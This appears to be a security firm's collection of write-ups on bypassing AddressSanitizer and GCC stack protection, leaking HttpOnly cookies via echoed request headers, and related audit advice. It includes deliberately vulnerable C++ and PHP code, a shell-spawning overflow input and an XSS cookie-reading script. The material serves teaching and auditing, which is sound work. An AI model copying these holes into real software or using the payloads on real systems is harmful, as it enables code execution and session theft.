New Whitepaper: Bypassing AddressSanitizer

Abstract

This paper evaluates AddressSanitizer as a next-generation memory corruption prevention framework. It provides demonstrable tests of the problems AddressSanitizer fixes, as well as of problems that still exist.

While developing the Watchman buffer overflow framework, it became apparent that some overflow cases were very difficult to solve. If an overflow does not cross heap block or object boundaries, but still crosses semantic boundaries, it never writes over the canary at the end of that block. We ran the Watchman test suite against AddressSanitizer and found that it fails in the same cases.

Below are some examples of programs that are not safe even with AddressSanitizer enabled. All
code was compiled with g++ 4.8.0 and AddressSanitizer enabled on Ubuntu 12.04.

Adjacent Buffers in the Same Struct/Class

The following source code demonstrates a vulnerable program:

#include <cstdio>
#include <cstdlib>

class Test {
public:
    Test() {
        command[0] = 'l';
        command[1] = 's';
        command[2] = '\0';
    }
    void a() {
        scanf("%s", buffer);   // unbounded read into buffer
        system(command);       // runs whatever now sits in command
    }
private:
    char buffer[10];
    char command[10];
};

int main() {
    Test aTest = Test();
    aTest.a();
}

This program can be manipulated into popping a shell with the following input:

user@host:~$ ./test
aaaaaaaaaa/bin/sh;
$
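
To make the mechanics concrete, the sketch below is our own illustration (it is not part of the whitepaper's test suite) and uses a hypothetical Layout struct that simply mirrors the data members of Test. The ten 'a' characters fill buffer, the trailing "/bin/sh;" spills directly into command, and because both arrays live inside one object the write never reaches the redzones AddressSanitizer places around the object as a whole.

// Minimal sketch, our own illustration; the Layout struct is hypothetical
// and mirrors the data members of the Test class above.
#include <cstddef>
#include <cstdio>

struct Layout {
    char buffer[10];
    char command[10];
};

int main() {
    // On typical compilers the two arrays are adjacent, so byte 10 of an
    // overly long write into buffer lands at command[0].
    printf("offsetof(buffer)  = %zu\n", offsetof(Layout, buffer));
    printf("offsetof(command) = %zu\n", offsetof(Layout, command));
    printf("sizeof(Layout)    = %zu\n", sizeof(Layout));
    // AddressSanitizer places its redzones around the whole object, not
    // between members, so the intra-object overflow above goes undetected.
    return 0;
}

With this layout the offsets are 0 and 10 and the total size is 20 bytes, so the eleventh byte of input lands in command[0].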


Dropping the Cookie Jar

HttpOnly is a great way to stop XSS attacks from stealing sessions. Usually. When you do an audit, make sure you don’t see anything like the “test.php” code below.


<?php
// test.php
// The cookie is flagged HttpOnly (the last setcookie argument) ...
setcookie("test", "test", null, "/", null, null, true);
// ... but every request header, including Cookie, is echoed into the body.
foreach (getallheaders() as $name => $value) {
    echo "$name: $value\n";
}
?>

If you do, there's a very simple way to bypass HttpOnly, because you're leaking the cookies from the request headers into the HTTP body. The same issue occurs when you print the output of "apache_request_headers" in PHP, and I'm sure it happens in other frameworks and languages as well.

                                                                
<html>
<head>
    <script>
    // some XSS!
    function cookieJar(){
        // wait for the full response, which now contains the Cookie header
        if (xhr.readyState == 4) {
            alert(xhr.responseText);
        }
    }
    var xhr = new XMLHttpRequest();
    xhr.withCredentials = true;
    xhr.onreadystatechange = cookieJar;
    xhr.open("GET", "/test.php", true);
    xhr.send(null);
    </script>
</head>
</html>

Of course, nobody would do something like that. I’ll just leave this link here:

http://code.ohloh.net/search?s=getallheaders&pp=0&fl=PHP&mp=1&ml=1&me=1&md=1&ff=1&filterChecked=true


ModSecurity sample logs

One important mitigation tactic is to use a Web Application Firewall. We prefer ModSecurity (http://www.modsecurity.org/). But what does an attack actually look like? We fired off an attack on our own site to show you.

[Screenshot: ModSecurity log of the sample attack]


The first rule of making your own authentication system

… is don’t. At Glider Security Inc. we created a Really Bad Authentication System. Don’t use it for anything except demonstrating bad security. This code doesn’t come with a warranty because it should not be used. There are *some* spoilers and fixes along the way.

https://github.com/ewimberley/RollMyOwnAuthentication


Modern Overflow Targets

Memory corruption vulnerabilities have become significantly more difficult to exploit on modern operating systems. Stack protections have rendered the original method of buffer overflow exploitation (putting the NOP sled and shellcode in the buffer and overwriting the instruction pointer with an address within the buffer) ineffective. Between Address Space Layout Randomization (ASLR) and stack cookies, it is difficult to exploit a remote system using the traditional overflow method without some sort of information leak.

That said, there are still gaping holes in stack input/output that can be exploited. This paper describes some general techniques for overflowing buffers on the stack without tripping __stack_chk_fail at all, or at least not until it's already too late. Rather than a new technique for redirecting execution flow via the EIP, we focus here on a new set of targets. Specifically, we will be discussing previously undocumented weaknesses in the function safety model for GCC 4.6 and below.

GCC ProPolice Documented Exceptions

According to the ProPolice documentation of the function safety model [2], the following cases are not protected:

  • Structures cannot be reordered, and pointers in the functions are unsafe

  • Pointer variables are unsafe when there are a variable number of arguments

  • Dynamically allocated character arrays are unsafe

  • Functions that call trampoline code are unsafe

We found the following additional cases to be unsafe:

  • Functions where more than one buffer is defined do not reorder correctly; at least one buffer may be corrupted before it is referenced (see the first sketch after this list)

  • Pointers or primitives in the argument list may be overwritten and then referenced before the canary check occurs

  • Any primitive or buffer inside a structure may be corrupted before it is referenced (this includes stack objects in C++)

  • Pointers to variables in lower stack frames are unsafe because that data may be written over and then referenced. Since we are no longer limited to the current stack frame, this includes local variables, pointers (e.g. function pointers), and other buffers.
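
As an illustration of the first new case above, here is a minimal sketch of our own (it does not appear in the whitepaper); the two_buffers function and its layout are assumptions for demonstration purposes. The function defines two stack buffers, an unbounded read into one can spill into the other, and the corrupted buffer is handed to system() before the canary check in the function epilogue ever runs.

// Minimal sketch of the multiple-buffer case (our own example, not taken
// from the whitepaper). Build with: g++ -fstack-protector sketch.cpp
#include <cstdio>
#include <cstdlib>
#include <cstring>

void two_buffers() {
    char command[16];
    char input[16];
    strcpy(command, "ls");
    // scanf with a bare %s performs an unbounded write. If the compiler
    // places input directly below command, a long line spills into command.
    scanf("%s", input);
    // command is referenced here, before the canary check that only runs in
    // the function epilogue, so __stack_chk_fail fires too late to help.
    system(command);
}

int main() {
    two_buffers();
    return 0;
}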

The IBM documentation on the function safety model is written with the assumption that the attack is a traditional stack overflow exploit. The documentation claims that data above the stack canary is safe after the function returns, which is true. The problem is that the data is not safe before the function returns. Pointers into higher addresses of the stack become vulnerable to corruption even if they are in a different stack frame, as the sketch below illustrates.
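
To make that concrete, here is a second minimal sketch of our own (again, not from the whitepaper); the copy_message function is a hypothetical example. On a 32-bit x86 calling convention, where arguments are passed on the stack above the return address, an overflow of the local buffer can reach the stack slot holding the dest pointer, and dest is then used as a write target before the canary check in the epilogue runs.

// Minimal sketch of corrupting a pointer that lives above the canary, in
// the caller's area of the stack (our own example, not from the whitepaper).
// Build with: g++ -m32 -fstack-protector sketch2.cpp
#include <cstdio>
#include <cstring>

void copy_message(char *dest) {
    char buffer[64];
    // Unbounded read: a long line can run past buffer, over the canary and
    // the return address, and into the stack slot holding dest.
    scanf("%s", buffer);
    // dest is dereferenced here, before __stack_chk_fail has had a chance
    // to notice the clobbered canary.
    strcpy(dest, buffer);
}

int main() {
    char out[256];
    copy_message(out);
    printf("%s\n", out);
    return 0;
}

Even when the smashed stack is eventually detected at function return, the attacker-controlled write through dest has already happened, which is exactly the "too late" case described above.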
